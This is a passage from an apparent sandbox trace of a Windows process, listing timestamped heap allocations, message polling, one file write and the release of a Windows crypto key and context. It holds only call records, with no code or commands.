(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0246.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0246.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0246.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0246.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0246.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0246.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0246.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0246.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0246.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0246.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0246.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0246.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0246.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0246.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0246.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0246.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0246.982] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f29678 | out: hHeap=0x970000) returned 1 [0246.983] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0246.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0246.983] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15660) returned 0x2f14010 [0246.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed4cc0 | out: hHeap=0x970000) returned 1 [0246.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0246.988] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0246.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0246.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0246.988] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0246.988] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0246.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0246.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0246.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0246.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0246.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0246.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0246.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15660) returned 0x2f29678 [0246.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0246.990] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f29678*, nNumberOfBytesToWrite=0x15660, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f29678*, lpNumberOfBytesWritten=0x8cf5e4*=0x15660, lpOverlapped=0x0) returned 1 [0246.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0246.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f29678 | out: hHeap=0x970000) returned 1 [0246.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0246.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0246.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0246.993] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0246.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0246.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0246.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0246.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0246.993] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0246.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0246.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0246.993] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0246.994] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0246.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0246.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0246.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0246.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0246.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0246.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0246.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0246.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0246.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0246.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0246.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0246.994] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0246.994] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0246.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0246.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0246.994] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0246.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0246.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0246.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0246.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0246.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0246.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0246.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51100, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0246.995] CryptDestroyKey (hKey=0xa87290) returned 1 [0246.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0246.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0246.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0246.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0246.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0246.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0246.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0246.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0246.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0246.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0246.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0246.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0246.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0246.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0246.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0246.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0246.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0246.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0246.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0246.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0246.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0246.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0246.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0246.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0246.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0246.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0246.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0246.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0246.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0246.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0246.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0246.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0246.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0246.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0246.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0246.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0246.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0246.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0246.996] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0246.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0246.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0246.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0246.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0246.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0246.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0246.997] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0246.997] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0246.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0246.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0246.997] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0246.997] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0246.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ab0 | out: hHeap=0x970000) returned 1 [0246.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0246.997] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0246.997] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0246.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0246.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0246.997] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0246.998] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0246.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ed8 | out: hHeap=0x970000) returned 1 [0246.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0246.998] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0246.998] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0246.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0246.998] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0246.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0246.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0246.998] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0246.998] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0246.998] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.998] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0246.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0246.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0246.998] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.998] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0246.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c00 | out: hHeap=0x970000) returned 1 [0246.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0246.999] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0246.999] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0246.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0246.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0246.999] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.999] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0246.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55fb8 | out: hHeap=0x970000) returned 1 [0246.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0246.999] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0246.999] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.999] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0246.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55e30 | out: hHeap=0x970000) returned 1 [0246.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0246.999] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0246.999] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0246.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0246.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0246.999] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0247.000] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0247.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0247.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0247.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0247.000] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0247.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0247.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0247.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0247.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0247.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0247.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0247.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0247.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0247.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0247.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0247.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0247.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0247.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0247.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0247.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0247.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0247.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0247.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0247.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0247.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0247.001] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0247.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0247.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0247.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0247.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0247.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0247.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0247.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0247.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0247.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0247.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0247.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0247.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0247.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0247.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0247.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0247.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 